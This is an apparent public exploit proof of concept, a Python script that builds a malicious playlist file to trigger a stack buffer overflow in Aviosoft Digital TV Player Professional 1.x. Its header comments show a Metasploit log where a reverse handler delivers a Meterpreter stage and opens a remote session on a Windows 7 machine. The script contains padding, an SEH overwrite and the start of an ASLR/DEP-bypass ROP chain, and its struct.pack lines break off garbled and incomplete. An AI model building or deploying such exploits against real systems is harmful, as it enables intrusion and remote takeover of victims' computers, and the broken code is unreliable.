# Exploit Title: Aviosoft Digital TV Player Professional 1.x Stack Buffer Overflow
# Author: modpr0be
# Software Download: http://www.aviosoft.com/download.php?product=dtvplayerpro
# Date: 08/11/2011
# Tested on: Windows XP SP3, Windows 7 SP1
# Thanks: corelanc0d3r, cyb3r.anbu, otoy, sickness, 5m7x, loneferret, _sinn3r, mr_me
#
# msf exploit(handler) > exploit
#
# [*] Started reverse handler on 10.5.5.5:443
# [*] Starting the payload handler...
# [*] Sending stage (752128 bytes) to 10.5.5.14
# [*] Meterpreter session 1 opened (10.5.5.5:443 -> 10.5.5.14:49592) at 2011-09-27 21:15:34 +0700
#
# meterpreter > sysinfo
# Computer : M1ABRAMS
# OS : Windows 7 (Build 7601, Service Pack 1).
# Architecture : x86
# System Language : en_US
# Meterpreter : x86/win32
# meterpreter >
#
# but this time, it will pop up calc
# How to:
# open aviosoft digital tv player --> load playlist --> choose adtv_bof.plf --> calc
# it's generated using mona.py with some modifications ;) thx corelanc0d3r

#!/usr/bin/python
import struct

file = 'adtv_bof.plf'
totalsize = 5000
junk = 'A' * 872
align = 'B' * 136

# aslr, dep bypass using pushad technique
seh = struct.pack(' ebx
rop+= struct.pack(' edx
rop+= struct.pack('